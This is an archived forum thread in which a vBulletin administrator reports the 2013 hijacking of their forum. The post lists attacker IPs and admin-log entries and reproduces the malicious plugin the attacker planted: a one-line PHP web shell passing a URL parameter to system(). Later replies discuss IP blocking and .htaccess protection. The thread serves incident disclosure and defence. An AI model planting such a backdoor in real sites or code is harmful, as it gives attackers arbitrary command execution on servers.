PDA

View Full Version : v4.2.0 hacker details

team74
09-22-2013, 08:52 PM
This script kiddy can't handle his hormones and has gone on a rampage.

https://www.google.co.uk/#q=%22ma3kesi%22

Most of the forums are running 4.2.0 (some patch 3). Several hundred (including mine) are showing that username indexed in google in the past week.

IP address found in my adminlog table, you can search them yourself, from Indonesia/Burma.

203.81.72.83
101.255.62.233
email (I think not real, they didn't need a real email once inside): ma3kesi@mm.com

Block these IPs, they are frequently used for all types of attacks (even on Gmail and facebook).

What they did.
From the adminlog (descending, so first actions at the bottom.:

Column headers: `adminlogid`, `userid`, `dateline`, `script`, `action`, `extrainfo`, `ipaddress`

7627, 1920, 1379801626, 'user.php', 'modify', '', '203.81.72.83'),
(7626, 1920, 1379801594, 'user.php', 'find', '', '203.81.72.83'),
(7625, 1920, 1379801583, 'user.php', 'find', '', '203.81.72.83'),
(7624, 1920, 1379801578, 'user.php', 'modify', '', '203.81.72.83'),
(7623, 1920, 1379801565, 'user.php', 'add', '', '203.81.72.83'),
(7622, 1920, 1379801447, 'plugin.php', '', '', '203.81.72.83'),
(7621, 1920, 1379801445, 'plugin.php', 'kill', 'plugin id = 40', '203.81.72.83'),
(7620, 1920, 1379801443, 'plugin.php', 'delete', 'plugin id = 40', '203.81.72.83'),
(7619, 1920, 1379801438, 'plugin.php', '', '', '203.81.72.83'),
(7618, 1920, 1379801436, 'plugin.php', 'kill', 'plugin id = 42', '203.81.72.83'),
(7617, 1920, 1379801434, 'plugin.php', 'delete', 'plugin id = 42', '203.81.72.83'),
(7616, 1920, 1379801428, 'plugin.php', '', '', '203.81.72.83'),
(7615, 1920, 1379801426, 'plugin.php', 'kill', 'plugin id = 41', '203.81.72.83'),
(7614, 1920, 1379801424, 'plugin.php', 'delete', 'plugin id = 41', '203.81.72.83'),
(7613, 1920, 1379801410, 'plugin.php', 'modify', '', '203.81.72.83'),
(7612, 1920, 1379801373, 'options.php', 'options', '', '203.81.72.83'),
(7611, 1920, 1379801371, 'options.php', 'dooptions', '', '203.81.72.83'),
(7610, 1920, 1379801359, 'options.php', 'options', '', '203.81.72.83'),
(7609, 1920, 1379801279, 'options.php', 'options', '', '203.81.72.83'),
(7608, 1920, 1379801226, 'options.php', 'options', '', '203.81.72.83'),
(7607, 1920, 1379801224, 'options.php', 'dooptions', '', '203.81.72.83'),
(7606, 1920, 1379801181, 'options.php', 'options', '', '203.81.72.83'),
(7605, 1920, 1379801180, 'options.php', 'dooptions', '', '203.81.72.83'),
(7604, 1920, 1379801144, 'options.php', 'options', '', '203.81.72.83'),
(7603, 1920, 1379801125, 'options.php', '', '', '203.81.72.83'),
(7602, 1920, 1379801038, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7601, 1920, 1379801023, 'user.php', 'modify', '', '203.81.72.83'),
(7600, 1920, 1379801021, 'user.php', 'kill', 'user id = 1919', '203.81.72.83'),
(7599, 1920, 1379801016, 'user.php', 'remove', 'user id = 1919', '203.81.72.83'),
(7598, 1920, 1379801011, 'user.php', 'edit', 'user id = 1919', '203.81.72.83'),
(7597, 1920, 1379801005, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7596, 1920, 1379800998, 'user.php', 'modify', '', '203.81.72.83'),
(7595, 1920, 1379800996, 'user.php', 'kill', 'user id = 1', '203.81.72.83'),
(7594, 1920, 1379800993, 'user.php', 'remove', 'user id = 1', '203.81.72.83'),
(7593, 1920, 1379800978, 'user.php', 'edit', 'user id = 1', '203.81.72.83'),
(7592, 1920, 1379800969, 'user.php', 'dopruneusers', '', '203.81.72.83'),
(7591, 1920, 1379800891, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7590, 1920, 1379800870, 'user.php', 'find', '', '203.81.72.83'),
(7589, 1920, 1379800860, 'user.php', 'modify', 'user id = 1', '203.81.72.83'),
(7588, 1920, 1379800858, 'user.php', 'update', 'user id = 1', '203.81.72.83'),
(7587, 1920, 1379800838, 'user.php', 'edit', 'user id = 1', '203.81.72.83'),
(7586, 1920, 1379800807, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7585, 1920, 1379800798, 'user.php', 'prune', '', '203.81.72.83'),
(7584, 1920, 1379800796, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7583, 1920, 1379800786, 'user.php', 'prune', '', '203.81.72.83'),
(7582, 1920, 1379800784, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7581, 1920, 1379800783, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7580, 1920, 1379800781, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7579, 1920, 1379800779, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7578, 1920, 1379800777, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7577, 1920, 1379800775, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7576, 1920, 1379800773, 'user.php', 'dopruneusers', '', '203.81.72.83'),
(7575, 1920, 1379800628, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7574, 1920, 1379800602, 'user.php', 'prune', '', '203.81.72.83'),
(7573, 1920, 1379800585, 'banning.php', 'dobanuser', 'username = mikey', '203.81.72.83'),
(7572, 1920, 1379800556, 'banning.php', 'banuser', '', '203.81.72.83'),
(7571, 1920, 1379800485, 'plugin.php', 'updateactive', '', '203.81.72.83'),
(7570, 1920, 1379800467, 'plugin.php', '', '', '203.81.72.83'),
(7569, 1920, 1379800465, 'plugin.php', 'kill', 'plugin id = 18', '203.81.72.83'),
(7568, 1920, 1379800462, 'plugin.php', 'delete', 'plugin id = 18', '203.81.72.83'),
(7567, 1920, 1379800445, 'plugin.php', '', '', '203.81.72.83'),
(7566, 1920, 1379800443, 'plugin.php', 'kill', 'plugin id = 17', '203.81.72.83'),
(7565, 1920, 1379800441, 'plugin.php', 'delete', 'plugin id = 17', '203.81.72.83'),
(7564, 1920, 1379800421, 'plugin.php', '', '', '203.81.72.83'),
(7563, 1920, 1379800420, 'plugin.php', 'kill', 'plugin id = 51', '203.81.72.83'),
(7562, 1920, 1379800416, 'plugin.php', 'delete', 'plugin id = 51', '203.81.72.83'),
(7561, 1920, 1379800412, 'plugin.php', 'modify', '', '203.81.72.83'),
(7560, 1920, 1379800376, 'navigation.php', 'list', 'navid = 0, tabid = 2', '203.81.72.83'),
(7559, 1920, 1379800371, 'navigation.php', 'update', 'navid = 0, tabid = 2', '203.81.72.83'),
(7558, 1920, 1379800363, 'navigation.php', 'list', 'navid = 0, tabid = 2', '203.81.72.83'),
(7557, 1920, 1379800361, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'),
(7556, 1920, 1379800359, 'navigation.php', 'default', 'navid = 2, tabid = 0', '203.81.72.83'),
(7555, 1920, 1379800351, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'),
(7554, 1920, 1379800349, 'navigation.php', 'update', 'navid = 0, tabid = 1', '203.81.72.83'),
(7553, 1920, 1379800343, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'),
(7552, 1920, 1379800341, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'),
(7551, 1920, 1379800338, 'navigation.php', 'default', 'navid = 75, tabid = 0', '203.81.72.83'),
(7550, 1920, 1379800283, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'),
(7549, 1920, 1379800281, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'),
(7548, 1920, 1379800278, 'navigation.php', 'default', 'navid = 1, tabid = 0', '203.81.72.83'),
(7547, 1920, 1379800273, 'navigation.php', 'list', 'navid = 0, tabid = 0', '203.81.72.83'),
(7546, 1920, 1379800181, 'template.php', 'updatetemplate', 'style id = 3', '203.81.72.83'),
(7545, 1920, 1379800170, 'template.php', 'edit', 'style id = 0', '203.81.72.83'),
(7544, 1920, 1379800166, 'template.php', 'modify', '', '203.81.72.83'),
(7543, 1920, 1379800156, 'template.php', 'modify', '', '203.81.72.83'),
(7542, 1920, 1379800151, 'template.php', 'modify', '', '203.81.72.83'),
(7541, 1920, 1379800099, 'plugin.php', '', '', '203.81.72.83'),
(7540, 1920, 1379800091, 'plugin.php', 'update', '', '203.81.72.83'),
(7539, 1920, 1379800067, 'plugin.php', 'add', '', '203.81.72.83'),
(7531, 1919, 1379796618, 'plugin.php', 'updateactive', '', '101.255.62.233'),
(7530, 1919, 1379796615, 'plugin.php', '', '', '101.255.62.233'),
(7529, 1919, 1379796615, 'plugin.php', 'doimport', '', '101.255.62.233'),
(7528, 1919, 1379796603, 'plugin.php', 'files', '', '101.255.62.233');

They deleted userid 1919 so I can't check it. 1920 is still there, and is the new admin after deleting me. You can also see they exploited it with one IP, and then carried out the rest of the attack with the other.

They inserted this plugin (it was id=52 for me):

(52, 'lol', 'ajax_complete', 'if(isset($_GET[''lol''])){echo\r\n"<h1>lol</h1><pre>"; system($_GET\r\n[''lol'']);exit;}', 'vbulletin', '', 1, 5);

And they deleted the default plugins that display the forum.

Initially they did change the main forum.php file too, I think this was through the admincp option because there is no sign of FTP access. I'm not a server guy, maybe they got in through SSH.

I also have about 550 lines of raw server log data, showing what these 2 IPs did. I'm not sure if I should post it for not though. It seems to start with admincp/zxc.php
pityocamptes
09-24-2013, 02:16 AM
Anyway just to post the IP's by themselves?
Max Taxable
09-24-2013, 02:33 AM
Block these IPs, they are frequently used for all types of attacks (even on Gmail and facebook).IP blocking is a near useless tool anymore, since IPs and even user agent strings are so easy to spoof. Great and informative post though, otherwise.
alirex
09-25-2013, 05:42 PM
That's why i am mostly left locked my admincp with .htaccess and allowed only my own IP. Atleast i am safe since last 8 month .. only got hacked once last year and that i recovered.